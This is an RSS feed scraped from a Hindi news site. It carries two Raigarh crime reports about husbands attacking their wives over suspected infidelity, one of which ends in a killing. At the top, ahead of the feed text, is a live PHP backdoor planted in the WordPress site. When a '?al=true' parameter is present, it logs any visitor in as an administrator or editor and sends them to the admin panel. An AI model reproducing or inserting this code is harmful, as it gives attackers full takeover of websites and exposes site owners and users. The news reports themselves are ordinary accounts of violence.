// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); character suspicion. – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 08 Oct 2024 15:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-रायगढ़ में चरित्र शंका में पत्नी पर हमला, बचाने वालों को भी किया घायल https://pratyushaashakinayikiran.com/?p=81628 Tue, 08 Oct 2024 15:45:00 +0000 https://pratyushaashakinayikiran.com/?p=81628 रायगढ़.

जोबी चैकी क्षेत्र में चरित्र शंका को लेकर घर में सो रही पत्नी पर धारदार टांगी से वार कर गंभीर रूप से घायल कर देने का मामला सामने आया है। इस दौरान बीच बचाव करने आये महिला के ससुर पर भी आरोपी ने सिर पर वार कर उसे भी घायल कर दिया है। पीड़ित की रिपोर्ट बाद पुलिस ने आज आरोपी को जंगल से गिरफ्तार कर लिया है।

जानकारी के अनुसार, रायगढ़ जिले के जोबी चैकी क्षेत्र के अंतर्गत आने वाले ग्राम अगासमार निवासी बाबूलाल धनवार ने बताया कि 05 अक्टूबर की सुबह 5 बजे के करीब उसके ही गांव का रहने वाला जगतराम धनवार उसके घर का दरवाजा खटखटाते हुए उठाया और बताया कि रात करीब 3 से 4 बजे के आसपास उसका ही बेटा श्याम कुमार धनवार नींद में गफिल अपनी ही पत्नी सुशीला धनवार के गर्दन में चरित्र शंका को लेकर धारदार टंगिया से प्राणघातक वार कर दिया। आरोपी के पिता जगतराम धनवार ने बताया कि हो हल्ला सुनकर जब मौके पर पहुंचकर बीच बचाव शुरू किया तो श्याम जान से मारने की बात कहते हुए उसके भी सिर पर वार कर दिया। अपनी पत्नी और पिता पर धारदार टांगी से वार कर आरोपी जंगल की तरफ भाग गया था। जगतराम धनवार ने बताया लहुलूहान हालत में उन्होंने इस घटना की जानकारी संजीवनी 108 में दी जिसके बाद दोनों घायलों को पहले खरसिया सिविल अस्पताल खरसिया ले जाकर भर्ती कराया गया जहां स्थिति में सुधार नही होनें पर उन्हें रायगढ़ मेडिकल कालेज अस्पताल में भर्ती करा दिया गया है जहां उनका उपचार जारी है। बताया जा रहा है कि सुशीला धनवार के गर्दन मे गंभीर चोंट पहुंचा है, जिसके कारण वह अभी बातचीत करने में असमर्थ है। वहीं जगतराम धनवार के सिर में चोंट आई। आरोपी के पिता ने उक्त मामले में रिपोर्ट जोबी चैकी में की है जिसके बाद पुलिस ने फरार आरोपी को आज जंगल में गिरफ्तार कर लिया है।

]]>
छत्तीसगढ़-रायगढ़ में व्यक्ति ने की पत्नी की हत्या, चरित्र शंका पर सिल बट्टे से किया हमला https://pratyushaashakinayikiran.com/?p=64644 Sat, 31 Aug 2024 17:36:00 +0000 https://pratyushaashakinayikiran.com/?p=64644 रायगढ़.

घरघोड़ा थाना क्षेत्र में चरित्र शंका को लेकर एक व्यक्ति ने अपनी ही पत्नी पर सिल लोढ़ा से वार करते हुए उसे मौत के घाट उतार दिया। इस घटना के बाद पुलिस आरोपी पति को हिरासत में लेकर पूछताछ कर रही है। घरघोड़ा थाना क्षेत्र के के ग्राम चोड़ीगुडा निवासी बसंत राठिया का पत्नी के साथ चरित्र शंका को लेकर विवाद हो गया।

देखते ही देखते दोनों के बीच विवाद इतना बढ़ गया कि बसंत राठिया ने घर में रखे सिल लोढ़ा से अपनी पत्नी रतना राठिया (49) के सिर पर हमला कर दिया। जिससे सिर में गंभीर चोट और अधिक रक्त बहने की वजह से घटनास्थल पर ही महिला की मौत हो गई। महिला की हत्या की सूचना मिलते ही पूरे गांव में दहशत का माहौल निर्मित हो गया। इसके बाद गांव के ग्रामीणों ने महिला की हत्या की जानकारी तत्काल घरघोड़ा थाने में दी, जिसके बाद मौके पर पहुंची पुलिस मृतका के शव को पोस्टमार्टम के लिये भेजते हुए आरोपी को हिरासत में लेकर पूछताछ कर रही है।  बताया जा रहा है कि सुबह के समय जब बसंत राठिया का अपनी पत्नी के साथ विवाद हो रहा था। उस समय उनके बच्चे अपने-अपने काम में गए थे। जिसके बाद उन्हें भी इस घटना से अवगत करा दिया गया है।

]]>